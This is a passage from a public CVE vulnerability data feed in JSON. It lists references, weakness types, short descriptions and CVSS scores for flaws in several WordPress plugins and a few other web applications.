"name" : "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3033134%40awesome-support&new=3033134%40awesome-support&sfp_email=&sfph_mail=", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/8494a0f6-7079-4fba-9901-76932b002c5a?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/8494a0f6-7079-4fba-9901-76932b002c5a?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/8494a0f6-7079-4fba-9901-76932b002c5a?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/8494a0f6-7079-4fba-9901-76932b002c5a?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The Awesome Support – WordPress HelpDesk & Support Plugin plugin for WordPress is vulnerable to union-based SQL Injection via the 'q' parameter of the wpas_get_users action in all versions up to, and including, 6.1.7 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with subscriber-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:getawesomesupport:awesome_support:*:*:*:*:*:wordpress:*:*", "versionEndIncluding" : "6.1.7", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 8.8, "baseSeverity" : "HIGH" }, "exploitabilityScore" : 2.8, "impactScore" : 5.9 } }, "publishedDate" : "2024-02-10T07:15Z", "lastModifiedDate" : "2024-11-21T08:46Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0595", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-862" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://plugins.trac.wordpress.org/browser/awesome-support/trunk/includes/functions-user.php#L765", "name" : "https://plugins.trac.wordpress.org/browser/awesome-support/trunk/includes/functions-user.php#L765", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://plugins.trac.wordpress.org/browser/awesome-support/trunk/includes/functions-user.php#L765", "name" : "https://plugins.trac.wordpress.org/browser/awesome-support/trunk/includes/functions-user.php#L765", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3033134%40awesome-support&new=3033134%40awesome-support&sfp_email=&sfph_mail=", "name" : "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3033134%40awesome-support&new=3033134%40awesome-support&sfp_email=&sfph_mail=", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3033134%40awesome-support&new=3033134%40awesome-support&sfp_email=&sfph_mail=", "name" : "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3033134%40awesome-support&new=3033134%40awesome-support&sfp_email=&sfph_mail=", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/bfb77432-e58d-466e-a366-8b8d7f1b6982?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/bfb77432-e58d-466e-a366-8b8d7f1b6982?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/bfb77432-e58d-466e-a366-8b8d7f1b6982?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/bfb77432-e58d-466e-a366-8b8d7f1b6982?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The Awesome Support – WordPress HelpDesk & Support Plugin plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on the wpas_get_users() function hooked via AJAX in all versions up to, and including, 6.1.7. This makes it possible for authenticated attackers, with subscriber-level access and above, to retrieve user data such as emails." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:getawesomesupport:awesome_support:*:*:*:*:*:wordpress:*:*", "versionEndExcluding" : "6.1.8", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "LOW", "integrityImpact" : "NONE", "availabilityImpact" : "NONE", "baseScore" : 4.3, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 2.8, "impactScore" : 1.4 } }, "publishedDate" : "2024-02-10T07:15Z", "lastModifiedDate" : "2024-11-21T08:46Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0596", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-862" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3033134%40awesome-support&new=3033134%40awesome-support&sfp_email=&sfph_mail=", "name" : "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3033134%40awesome-support&new=3033134%40awesome-support&sfp_email=&sfph_mail=", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3033134%40awesome-support&new=3033134%40awesome-support&sfp_email=&sfph_mail=", "name" : "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3033134%40awesome-support&new=3033134%40awesome-support&sfp_email=&sfph_mail=", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/e4358e2a-b7f6-44b6-a38a-5b27cb15e1cd?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/e4358e2a-b7f6-44b6-a38a-5b27cb15e1cd?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/e4358e2a-b7f6-44b6-a38a-5b27cb15e1cd?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/e4358e2a-b7f6-44b6-a38a-5b27cb15e1cd?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The Awesome Support – WordPress HelpDesk & Support Plugin plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the editor_html() function in all versions up to, and including, 6.1.7. This makes it possible for authenticated attackers, with subscriber-level access and above, to view password protected and draft posts." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:getawesomesupport:awesome_support:*:*:*:*:*:wordpress:*:*", "versionEndExcluding" : "6.1.8", "cpe_name" : [ ] } ] } ] }, "impact" : { }, "publishedDate" : "2024-02-10T07:15Z", "lastModifiedDate" : "2024-11-21T08:46Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0597", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-79" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://plugins.trac.wordpress.org/changeset/3023398/", "name" : "https://plugins.trac.wordpress.org/changeset/3023398/", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://plugins.trac.wordpress.org/changeset/3023398/", "name" : "https://plugins.trac.wordpress.org/changeset/3023398/", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/a61a8d8b-f22f-4a16-95f6-6cf52cf545ad?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/a61a8d8b-f22f-4a16-95f6-6cf52cf545ad?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/a61a8d8b-f22f-4a16-95f6-6cf52cf545ad?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/a61a8d8b-f22f-4a16-95f6-6cf52cf545ad?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The SEO Plugin by Squirrly SEO plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in all versions up to and including 12.3.15 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:squirrly:seo_plugin_by_squirrly_seo:*:*:*:*:*:wordpress:*:*", "versionEndIncluding" : "12.3.15", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "HIGH", "userInteraction" : "REQUIRED", "scope" : "CHANGED", "confidentialityImpact" : "LOW", "integrityImpact" : "LOW", "availabilityImpact" : "NONE", "baseScore" : 4.8, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 1.7, "impactScore" : 2.7 } }, "publishedDate" : "2024-02-05T22:16Z", "lastModifiedDate" : "2024-11-21T08:46Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0598", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-79" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://advisory.abay.sh/cve-2024-0598", "name" : "https://advisory.abay.sh/cve-2024-0598", "refsource" : "", "tags" : [ "Exploit" ] }, { "url" : "https://advisory.abay.sh/cve-2024-0598", "name" : "https://advisory.abay.sh/cve-2024-0598", "refsource" : "", "tags" : [ "Exploit" ] }, { "url" : "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3023068%40kadence-blocks&new=3023068%40kadence-blocks&sfp_email=&sfph_mail=", "name" : "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3023068%40kadence-blocks&new=3023068%40kadence-blocks&sfp_email=&sfph_mail=", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3023068%40kadence-blocks&new=3023068%40kadence-blocks&sfp_email=&sfph_mail=", "name" : "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3023068%40kadence-blocks&new=3023068%40kadence-blocks&sfp_email=&sfph_mail=", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/989bd778-c7b2-41c5-ac4a-2f1a4e594f0d?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/989bd778-c7b2-41c5-ac4a-2f1a4e594f0d?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/989bd778-c7b2-41c5-ac4a-2f1a4e594f0d?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/989bd778-c7b2-41c5-ac4a-2f1a4e594f0d?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The Gutenberg Blocks by Kadence Blocks – Page Builder Features plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the contact form message settings in all versions up to and including 3.2.17 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with editor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This primarily affects multi-site installations and installations where unfiltered_html has been disabled." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:kadencewp:gutenberg_blocks_with_ai:*:*:*:*:*:wordpress:*:*", "versionEndExcluding" : "3.2.18", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "HIGH", "userInteraction" : "REQUIRED", "scope" : "CHANGED", "confidentialityImpact" : "LOW", "integrityImpact" : "LOW", "availabilityImpact" : "NONE", "baseScore" : 4.8, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 1.7, "impactScore" : 2.7 } }, "publishedDate" : "2024-04-09T19:15Z", "lastModifiedDate" : "2025-02-06T18:51Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0599", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://github.com/sweatxi/BugHub/blob/main/Jspxcms.pdf", "name" : "https://github.com/sweatxi/BugHub/blob/main/Jspxcms.pdf", "refsource" : "", "tags" : [ "Exploit" ] }, { "url" : "https://github.com/sweatxi/BugHub/blob/main/Jspxcms.pdf", "name" : "https://github.com/sweatxi/BugHub/blob/main/Jspxcms.pdf", "refsource" : "", "tags" : [ "Exploit" ] }, { "url" : "https://vuldb.com/?ctiid.250837", "name" : "https://vuldb.com/?ctiid.250837", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.250837", "name" : "https://vuldb.com/?ctiid.250837", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.250837", "name" : "https://vuldb.com/?id.250837", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.250837", "name" : "https://vuldb.com/?id.250837", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability was found in Jspxcms 10.2.0. It has been declared as problematic. Affected by this vulnerability is an unknown functionality of the file src\\main\\java\\com\\jspxcms\\core\\web\\back\\InfoController.java of the component Document Management Page. The manipulation of the argument title leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-250837 was assigned to this vulnerability." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:ujcms:jspxcms:10.2.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "REQUIRED", "scope" : "CHANGED", "confidentialityImpact" : "LOW", "integrityImpact" : "LOW", "availabilityImpact" : "NONE", "baseScore" : 5.4, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 2.3, "impactScore" : 2.7 } }, "publishedDate" : "2024-01-16T20:15Z", "lastModifiedDate" : "2024-11-21T08:46Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0601", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-918" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://github.com/biantaibao/Austin_SSRF/blob/main/SSRF.md", "name" : "https://github.com/biantaibao/Austin_SSRF/blob/main/SSRF.md", "refsource" : "", "tags" : [ "Exploit" ] }, { "url" : "https://github.com/biantaibao/Austin_SSRF/blob/main/SSRF.md", "name" : "https://github.com/biantaibao/Austin_SSRF/blob/main/SSRF.md", "refsource" : "", "tags" : [ "Exploit" ] }, { "url" : "https://vuldb.com/?ctiid.250838", "name" : "https://vuldb.com/?ctiid.250838", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.250838", "name" : "https://vuldb.com/?ctiid.250838", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.250838", "name" : "https://vuldb.com/?id.250838", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.250838", "name" : "https://vuldb.com/?id.250838", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability was found in ZhongFuCheng3y Austin 1.0. It has been rated as critical. Affected by this issue is the function getRemoteUrl2File of the file src\\main\\java\\com\\java3y\\austin\\support\\utils\\AustinFileUtils.java of the component Email Message Template Handler. The manipulation leads to server-side request forgery. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-250838 is the identifier assigned to this vulnerability." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:zhongfucheng3y:austin:1.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "NONE", "availabilityImpact" : "NONE", "baseScore" : 6.5, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 2.8, "impactScore" : 3.6 } }, "publishedDate" : "2024-01-16T22:15Z", "lastModifiedDate" : "2024-11-21T08:46Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0602", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-79" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://advisory.abay.sh/cve-2024-0602", "name" : "https://advisory.abay.sh/cve-2024-0602", "refsource" : "", "tags" : [ "Exploit" ] }, { "url" : "https://advisory.abay.sh/cve-2024-0602", "name" : "https://advisory.abay.sh/cve-2024-0602", "refsource" : "", "tags" : [ "Exploit" ] }, { "url" : "https://plugins.trac.wordpress.org/changeset/3037032/yet-another-related-posts-plugin/tags/5.30.10/includes/yarpp_options.php?old=2999784&old_path=yet-another-related-posts-plugin/tags/5.30.9/includes/yarpp_options.php", "name" : "https://plugins.trac.wordpress.org/changeset/3037032/yet-another-related-posts-plugin/tags/5.30.10/includes/yarpp_options.php?old=2999784&old_path=yet-another-related-posts-plugin/tags/5.30.9/includes/yarpp_options.php", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://plugins.trac.wordpress.org/changeset/3037032/yet-another-related-posts-plugin/tags/5.30.10/includes/yarpp_options.php?old=2999784&old_path=yet-another-related-posts-plugin/tags/5.30.9/includes/yarpp_options.php", "name" : "https://plugins.trac.wordpress.org/changeset/3037032/yet-another-related-posts-plugin/tags/5.30.10/includes/yarpp_options.php?old=2999784&old_path=yet-another-related-posts-plugin/tags/5.30.9/includes/yarpp_options.php", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/10aa1dd7-f909-4ebe-b29b-2f2743b3e08a?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/10aa1dd7-f909-4ebe-b29b-2f2743b3e08a?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/10aa1dd7-f909-4ebe-b29b-2f2743b3e08a?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/10aa1dd7-f909-4ebe-b29b-2f2743b3e08a?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The YARPP – Yet Another Related Posts Plugin plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in all versions up to, and including, 5.30.9 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:yarpp:yet_another_related_posts_plugin:*:*:*:*:*:wordpress:*:*", "versionEndExcluding" : "5.30.10", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:C/C:L/I:L/A:N", "attackVector" : "NETWORK", "attackComplexity" : "HIGH", "privilegesRequired" : "HIGH", "userInteraction" : "REQUIRED", "scope" : "CHANGED", "confidentialityImpact" : "LOW", "integrityImpact" : "LOW", "availabilityImpact" : "NONE", "baseScore" : 4.0, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 1.0, "impactScore" : 2.7 } }, "publishedDate" : "2024-02-29T01:43Z", "lastModifiedDate" : "2025-02-26T15:14Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0603", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://note.zhaoj.in/share/n3QsNbORUR0e", "name" : "https://note.zhaoj.in/share/n3QsNbORUR0e", "refsource" : "", "tags" : [ "Broken Link" ] }, { "url" : "https://note.zhaoj.in/share/n3QsNbORUR0e", "name" : "https://note.zhaoj.in/share/n3QsNbORUR0e", "refsource" : "", "tags" : [ "Broken Link" ] }, { "url" : "https://vuldb.com/?ctiid.250839", "name" : "https://vuldb.com/?ctiid.250839", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.250839", "name" : "https://vuldb.com/?ctiid.250839", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.250839", "name" : "https://vuldb.com/?id.250839", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.250839", "name" : "https://vuldb.com/?id.250839", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability classified as critical has been found in ZhiCms up to 4.0. This affects an unknown part of the file app/plug/controller/giftcontroller.php. The manipulation of the argument mylike leads to deserialization. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-250839." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:zhicms:zhicms:*:*:*:*:*:*:*:*", "versionEndIncluding" : "4.0", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 9.8, "baseSeverity" : "CRITICAL" }, "exploitabilityScore" : 3.9, "impactScore" : 5.9 } }, "publishedDate" : "2024-01-16T22:15Z", "lastModifiedDate" : "2024-11-21T08:46Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0604", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-79" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://advisory.abay.sh/cve-2024-0604", "name" : "https://advisory.abay.sh/cve-2024-0604", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://advisory.abay.sh/cve-2024-0604", "name" : "https://advisory.abay.sh/cve-2024-0604", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://plugins.trac.wordpress.org/changeset?old_path=%2Ffoogallery%2Ftags%2F2.4.7&old=3035688&new_path=%2Ffoogallery%2Ftags%2F2.4.9&new=3035688&sfp_email=&sfph_mail=", "name" : "https://plugins.trac.wordpress.org/changeset?old_path=%2Ffoogallery%2Ftags%2F2.4.7&old=3035688&new_path=%2Ffoogallery%2Ftags%2F2.4.9&new=3035688&sfp_email=&sfph_mail=", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://plugins.trac.wordpress.org/changeset?old_path=%2Ffoogallery%2Ftags%2F2.4.7&old=3035688&new_path=%2Ffoogallery%2Ftags%2F2.4.9&new=3035688&sfp_email=&sfph_mail=", "name" : "https://plugins.trac.wordpress.org/changeset?old_path=%2Ffoogallery%2Ftags%2F2.4.7&old=3035688&new_path=%2Ffoogallery%2Ftags%2F2.4.9&new=3035688&sfp_email=&sfph_mail=", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/d17d9610-d0fd-419d-a7ea-e9c313f1c542?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/d17d9610-d0fd-419d-a7ea-e9c313f1c542?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/d17d9610-d0fd-419d-a7ea-e9c313f1c542?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/d17d9610-d0fd-419d-a7ea-e9c313f1c542?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The Best WordPress Gallery Plugin – FooGallery plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in all versions up to, and including, 2.4.7 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:fooplugins:foogallery:*:*:*:*:-:wordpress:*:*", "versionEndIncluding" : "2.4.7", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "HIGH", "userInteraction" : "REQUIRED", "scope" : "CHANGED", "confidentialityImpact" : "LOW", "integrityImpact" : "LOW", "availabilityImpact" : "NONE", "baseScore" : 4.8, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 1.7, "impactScore" : 2.7 } }, "publishedDate" : "2024-02-29T01:43Z", "lastModifiedDate" : "2025-02-13T16:54Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0605", "ASSIGNER" : "security@mozilla.org" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-362" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://bugzilla.mozilla.org/show_bug.cgi?id=1855575", "name" : "https://bugzilla.mozilla.org/show_bug.cgi?id=1855575", "refsource" : "", "tags" : [ "Issue Tracking", "Permissions Required" 